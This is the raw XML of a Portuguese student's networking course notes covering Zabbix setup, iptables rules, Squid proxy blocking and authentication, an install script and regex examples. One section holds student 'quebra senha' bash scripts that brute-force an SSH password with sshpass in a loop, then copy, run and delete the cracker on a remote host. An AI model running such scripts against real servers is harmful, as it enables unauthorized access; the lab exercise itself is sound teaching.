        <w:t xml:space="preserve">//arquivo tarball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8. Acessando o zabbix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user: admin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password: zabbix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USO DO ZABBIX NA WEB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O MONITORAMENTO PELO ZABBIX PODE SER VIA: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*simples check (icmp)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Agent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* snmp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MONITORAR UM HOST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Configurar o IP do host para o mesmo que o da rede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adicionar o host no zabbix web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criar um template ou utilizar um existente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SEGURANÇA DE REDES</w:t>
      </w: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PERMITIR PING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-A OUTPUT -p icmp --icmp-type 8 -s 192.168.0.1/24 -d 192.168.0.2/24 -j ACCEPT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-A INPUT -p icmp --icmp-type 0 -s 192.168.0.2/24 -d 192.168.0.1/24 -j ACCEPT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LIMPAR REGRAS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BLOQUEAR/PERMITIR ACESSO ICMP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-A INPUT -p icmp -j DROP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-A INPUT -p icmp -j ACCEPT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VER AS POLÍTICAS DE REGRAS DO IPTABLES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-t filter -L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-nat -L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-mangle -L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POLÍTICA RESTRITIVA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-P INPUT DROP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-P OUTPUT DROP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-P FORWARD DROP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PROXY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controle de log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cache na memória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Relatórios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Vantagens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São úteis na manutenção de dados para o log de informações sobre as conexões aos serviços de Internet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São úteis na utilização de cache de informações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Podem realizar filtragem inteligente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Podem realizar autentificação em nível de usuário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Oferecem proteção automática para as implementações IP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Desvantagens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Podem necessitar de servidores diferentes para cada serviço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Os serviços oferecidos por proxy ocasionam um certo atraso na utilização dos mesmos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360"/>
        <w:ind w:right="0" w:left="708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No servidor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apt-get install squid3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arquivo de configuração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http_port 3128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visible_hostname Tiffany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acl all src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http_access allow(ou deny)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squid3 -k reconfigure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No cliente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abra o navegador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ferramentas - opções da internet - conexões - configurações da LAN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LIMITAR O USO DE CERTAS PALAVRAS PARA NAVEGAÇÃO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criar o arquivo /etc/squid3/bloqueados/block.txt  -&gt; digitar dentro dele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as palavras que devem ser bloqueadas em lista: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casa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comida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maps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digitar no /etc/squid/squid.conf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http_port 3128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visible_hostname Tiffany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acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt"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http_access deny proibido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acl all src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http_access allow(ouy deny)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squid3 -k reconfigure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PROIBIR ACESSO A SITES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/etc/squid/squid.conf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http_port 3128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visible_hostname Tiffany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acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt"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http_access deny proibido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acl bloqueados dstdomain clickjogos.com.br jogos360.com.br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http_access deny bloqueados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(ou acl proibidos dstdom_regex –i “/etc/squid/proibidos.txt”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http_access deny proibidos)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(ou acl dominionegado dstdomain .br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http_access deny dominionegado)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acl all src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http_access allow(ouy deny)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squid3 -k reconfigure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HABILITAR AUTENTIFICAÇÃO DE USUÁRIO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/etc/squid/squid.conf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http_port 3128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visible_hostname Tiffany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acl proibido url_regex -i "/etc/squid3/bloqueados/block.txt" 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http_access deny proibido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auth_param basic realm Proxy_Tiffany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auth_param basic program /usr/lib/squid/basic_ncsa_auth  /etc/squid/squid_passwd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acl autenticacao proxy_auth REQUIRED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http_access allow autenticacao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acl all src all</w:t>
      </w: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http_access allow(ouy deny) all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Crie um arquivo vazio para armazenar as senhas de usuários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touch /etc/squid/squid_passwd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Crie um novo usuário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adduser jose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Adicionar uma senha para o usuário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htpasswd /etc/squid/squid_passwd jose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squid3 –k reconfigure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 –k reconfigure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HABILITAR CONFIGURAÇÃO AUTOMÁTICA DA PORTA DO NAVEGADOR DE INTERNET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/etc/squid/squid.conf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http_port 3128 transparent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squid3 –k reconfigure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squid –k reconfigure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–t nat –A PREROUTING –i eth0 –p tcp --dport 80 –j REDIRECT –to-port 3128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#Se a máquina estiver instalada em outra máquina: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iptables –t nat –A PREROUTING –i eth0 –p tcp --dport 80 –j REDIRECT –to-dest IP: 3128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GERAÇÃO DE RELATÓRIO DE ACESSO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 install srg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/etc/squid/squid.conf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Cache_access_log /var/log/squid3/access.log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/sr.conf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Descomentar: output_dir “var/www/htmil/srg_resports/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srg /var/log/squid3/access.log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servisse squid3 restart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No navegador do cliente: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[ip do proxy]/srg_reports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firewall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endian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ufw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brasilufw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ipcop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360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PROGRAMAÇÃO PARA REDES</w:t>
      </w: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SCRIPT QUEBRA SENHA (serv. A - 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Scrip para encontrar a senha de um servidor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Criado por Tiffany Panegalli &amp; Igor Jambeiro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Turma: R3M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Comando para acessar um servidor através do ssh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"Bem-vindo ao script \"quebra senha\""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"Digite o nome de usuário"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"Digite o IP da rede que deseja acessar"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#Comando para descobrir a senha do usuário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PASSWORD=489    #Atribuindo um valor à variável PASSWORD, para fins de testes (para teste efitivo: PASSWORD=999)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[ $PASSWORD -le 999 ]     #O programa ficará em andamento enquanto a senha for menor que 999. Logo, o Loop só irá parar quando a senha do usuário for encontrada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PASSWORD=$((PASSWORD-1))        #A variável PASSWORD será decrementada até que se encontre a senha correta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echo $PASSWORD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echo "$PASSWORD" &gt; ~/senha_encontrada   #Comando para redirecionar o valor da variável PASSWORD para o arquivo /home/senha_encontrada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sshpass -p "$PASSWORD" scp /etc/network/interfaces $USER@$IP:/dev/null &amp;&amp;  break        #Comando para cópia remota via ssh. Neste caso será copiado o arquivo /etc/network/interfaces para o arquivo /dev/null, que é um arquivo padrão do debian para testes, onde tudo que é gravado é excluído automaticamente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echo "Senha Encontrada: acessar cat ~/senha_encontrada!!!"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cat ~/senha_encontrada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480"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b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2E74B5"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT QUEBRA SENHA (serv. A - B - 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#Programador: Tiffany Panegalli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#Turma: R3M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############################################################################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#Comando para acessar um servidor através do ssh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"Bem-vindo ao scrip \"quebra senha\"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"Digite o nome do usuário:"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"Digite a senha do usuário:"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PASSWORD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"Digite o IP da rede que deseja acessar:"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#Comandos para acessar o servidor através do ssh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sshpass -p "$PASSWORD" scp quebra_senha.sh $USER@$IP:/home/$USER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sshpass -p "$PASSWORD" ssh $USER@$IP './quebra_senha.sh'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sshpass -p "$PASSWORD" scp $USER@$IP:~/senha_encontrada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#Comandos para remover os arquivos criados em outro servidor e exibí-los na máquina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sshpass -p "$PASSWORD" ssh $USER@$IP 'rm ~/quebra_senha.sh'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sshpass -p "$PASSWORD" ssh $USER@$IP 'rm ~/senha_encontrada'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"senha encontrada!!!"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"o arquivo senha_encontrada foi copiado para o seu diretório local:"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 senha_encontrada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SCRIPT PARA CONFIGURAÇÃO DE REPOSITÓRIO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#Script para criação de repositorio no debian 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#Criado por: Tiffany Panegalli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#1 semestre de 2018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"Bem-vindo ao script para criação de repositório local"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"digite o IP da rede onde estão os repositórios:"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#mostrar pontos de montagem no ip determinado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showmount -e $IP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"São esses os repositórios que você procura?(y/n)"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RESP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[ "$RESP" = "y" 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mkdir /mnt/repo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#comando para montagem de repositório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mount -t nfs -o nfsvers=3 $IP:/home/celso/FTP/Linux/debian93 /mnt/repo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mkdir /mnt/share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mkdir /mnt/share/blu1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mkdir /mnt/share/blu2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mkdir /mnt/share/blu3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echo "listando conteúdo do diretório /mnt/repo..."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ls -l /mnt/repo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#Configuração do sources.list para funcionar pelo repositório local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seq 3 | xargs -I@ mount -t iso9660 -o loop,ro /mnt/repo/debian-9.3.0-amd64-BD-@.iso /mnt/share/blu@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seq 3 | xargs -I@ echo deb [trusted=yes] file:/mnt/share/blu@ stretch main contrib &gt; /etc/apt/sources.list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apt update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echo "IP inválido"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SCRIPT PARA INSTALAÇÃO DO ZABBIX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                 Instalação Zabbix-3.4.7                  #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                 Debian 9.3 GNU/Linux 2018                 #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#############################################################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clear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printf "\n\033[41;1;38mInstalação Zabbix 2017\033[0;0m\n\n"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apt-get update &gt; /dev/null 2&gt; /dev/null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printf "\n\033[31mFalha na atualização do repositório Debian\033[0;0m\n\n"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printf "\n\033[44;1;38m1. Instalado dependências\033[0;0m\n\n"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apt install build-essential snmp vim libssh2-1-dev libssh2-1 libopenipmi-dev libevent* libpcre* -y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printf "\n\033[31mFalha na Instalação de alguns pacotes\033[0;0m\n\n"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apt install libsnmp-dev wget libcurl4-gnutls-dev fping libxml2 libxml2-dev curl libcurl3-gnutls -y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printf "\n\033[31mFalha na Instalação de alguns pacotes\033[0;0m\n\n"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apt install libcurl3-gnutls-dev libiksemel-dev libiksemel-utils libiksemel3 -y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printf "\n\033[31mFalha na Instalação de alguns pacotes\033[0;0m\n\n"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apt install apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 php7.0-gd libpq5 libpq-dev mysql-server mysql-client libmariadbd-dev -y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printf "\n\033[31mFalha na Instalação de alguns pacotes\033[0;0m\n\n"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apt install php-bcmath php-mbstring php-ldap php-xml php-xmlreader php-xmlwriter -y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printf "\n\033[31mFalha na Instalação de alguns pacotes\033[0;0m\n\n"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printf "\n\033[44;1;38m2. Criando o banco de dados no MariaDB\033[0;0m\n\n"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mysql -u root -e "create database zabbix character set utf8;"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mysql -u root -e "GRANT ALL PRIVILEGES ON *.* TO zabbix@localhost IDENTIFIED BY 'zabbix' WITH GRANT OPTION;"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printf "\n\033[31mFalha na criação do banco de dados no MariaDB\033[0;0m\n\n"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printf "\n\033[44;1;38m3. Configurando o PHP\033[0;0m\n\n"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sed -i 's/;date.timezone =/date.timezone = "America\/Sao_Paulo"/g' /etc/php/7.0/apache2/php.ini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sed -i 's/max_execution_time = 30/max_execution_time = 300/g' /etc/php/7.0/apache2/php.ini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sed -i 's/max_input_time = 60/max_input_time = 300/g' /etc/php/7.0/apache2/php.ini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sed -i 's/post_max_size = 8M/post_max_size = 16M/g' /etc/php/7.0/apache2/php.ini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sed -i 's/;always_populate_raw_post_data = -1/always_populate_raw_post_data = -1/g' /etc/php/7.0/apache2/php.ini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/etc/init.d/apache2 restart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printf "\n\033[31mFalha na configuração do PHP\033[0;0m\n\n"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printf "\n\033[44;1;38m4. Instalando o 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printf "\n\033[36m4.1. Criando usuário zabbix, descompactando tarball e populando banco\033[0;0m\n\n"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adduser zabbix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cp zabbix-3.4.7.tar.gz /usr/src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cd /usr/src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tar -zxvf zabbix-3.4.7.tar.gz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chmod -R +x zabbix-3.4.7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printf "\n\033[36m4.2. Populando o banco de dados no MariaDB\033[0;0m\n\n"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cat zabbix-3.4.7/database/mysql/schema.sql |mysql -uzabbix -pzabbix zabbix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cat zabbix-3.4.7/database/mysql/images.sql | mysql -uzabbix -pzabbix zabbix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cat zabbix-3.4.7/database/mysql/data.sql | mysql -uzabbix -pzabbix zabbix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printf "\n\033[36m4.3. Compilando e Instalando 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#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cd zabbix-3.4.7/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./configure --enable-server --enable-agent --with-mysql --with-jabber=/usr --with-libcurl=/usr/bin/curl-config --with-ssh2 --with-openipmi --with-libxml2 --with-net-snmp &amp;&amp; printf "\n\033[45;1;32mConfigurado\033[0;0m\n\n"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#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make install &amp;&amp; printf "\n\033[45;1;32mCompilado e Instalado\033[0;0m\n\n"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#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printf "\n\033[31mFalha na Compilação e Instalação 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printf "\n\033[44;1;38m5. Configurando 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#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printf "\n\033[36m5.1. Configurando Agent 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sleep 2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PidFile=\/tmp\/zabbix_agentd.pid/PidFile=\/tmp\/zabbix_agentd.pid/g' /usr/local/etc/zabbix_agentd.conf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LogFileSize=1/LogFileSize=2/g' /usr/local/etc/zabbix_agentd.conf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DebugLevel=3/DebugLevel=3/g' /usr/local/etc/zabbix_agentd.conf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ListenPort=10050/ListenPort=10050/g' /usr/local/etc/zabbix_agentd.conf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's/Hostname=Zabbix server/Hostname=zabbixServer/g' /usr/local/etc/zabbix_agentd.conf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's/debian/zabbixServer/g' /etc/hostname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Timeout=3/Timeout=3/g' /usr/local/etc/zabbix_agentd.conf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printf "\n\033[36m5.2. Configurando Zabbix Server\033[0;0m\n\n"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ListenPort=10051/ListenPort=10051/g'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LogFileSize=1/LogFileSize=2/g'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PidFile=\/tmp\/zabbix_server.pid/PidFile=\/tmp\/zabbix_server.pid/g'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DBHost=localhost/DBHost=localhost/g'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DBPassword=/DBPassword=zabbix/g'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StartIPMIPollers=0/StartIPMIPollers=1/g'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StartDiscoverers=1/StartDiscoverers=5/g'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's/Timeout=4/Timeout=3/g'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sed -i 's/# FpingLocation=\/usr\/sbin\/fping/FpingLocation=\/usr\/bin\/fping/g' /usr/local/etc/zabbix_server.conf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printf "\n\033[36m5.3. Copiando os arquivos de frontend do Zabbix para o diretório /var/www/html/zabbix\033[0;0m\n\n"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mkdir /var/www/html/zabbix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cp -R /usr/src/zabbix-3.4.7/frontends/php/* /var/www/html/zabbix/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# Tornando os arquivos executáveis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chown -R www-data:www-data /var/www/html/zabbix/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cp /usr/src/zabbix_server /etc/init.d/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cp /usr/src/zabbix_agentd /etc/init.d/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chmod +x /etc/init.d/zabbix_server /etc/init.d/zabbix_agentd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# Executando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/etc/init.d/zabbix_server start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/etc/init.d/zabbix_agentd start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# Habilitando os scripts para serem executados quando o computador for ligado.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update-rc.d -f zabbix_server defaults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update-rc.d -f zabbix_agentd defaults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if [ $? != 0 ]; then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printf "\n\033[31mFalha na Instalação do Zabbix\033[0;0m\n\n"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echo ""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cd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rm /usr/src/script-instalacao*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rm -rf /usr/src/zabbix*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printf "\n\033[33mFinalizada Instalação.\033[0;0m\n\n"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EXPRESSÕES REGULARES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Expressão para filtrar um CEP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[0-9]{5}-[0-9]{3}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="3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65478-365</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="3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Expressão para filtrar um número de telefone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[(][0-9]{2}[)]9[0-9]{4}-[0-9]{4}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(11)95874-6358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Expressão para validar hora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([01][0-9]|2[0-3]):[0-5][0-9]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14:00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Expressão para validar uma data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([0-2][0-9]|3[01])/(0[0-9]|1[0-2])/[0-9]{4}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14/12/2000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Expressão para validar e-mail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- ([0-9]|[a-z]|[A-Z]|[-_.])*[@]([0-9]|[a-z]|[A-Z])*[.]([a-z]|[A-Z]|[.])*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priscila_25@bol.uol.com.br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" w:after="0" w:line="480"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/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2E74B5"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT PARA O CEP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#!/bin/bash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echo "Digite um CEP"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read cep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cepValido=$(echo $cep|grep -E "^[0-9]{5}-[0-9]{3}$")</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">#^$ = só aceita a expressão regular; cerca a expressão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#=$() = armazena o resultado de um comando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if [ -z $cepValido ]</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">#-z = nulo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then</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">#-E = versão estendida de expressões regulares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echo "CEP errado"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 echo "CEP correto"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fi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www.maranhao.com.br/" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Target="media/image0.wmf" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship TargetMode="External" Target="file://\mnt\share" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Target="styles.xml" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/><Relationship TargetMode="External" Target="http://www.maranhao.com.br/" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship TargetMode="External" Target="http://www.tiffany.com.br/" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Target="embeddings/oleObject0.bin" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"/><Relationship TargetMode="External" Target="https://sourceforge.net/projects/zabbix/files/" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship TargetMode="External" Target="http://www.cultura.ufpa.br/dicas/htm/htm-cor2.htm" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship TargetMode="External" Target="http://www.panegalli.com.br/" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Target="numbering.xml" Id="docRId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering"/></Relationships>
</file>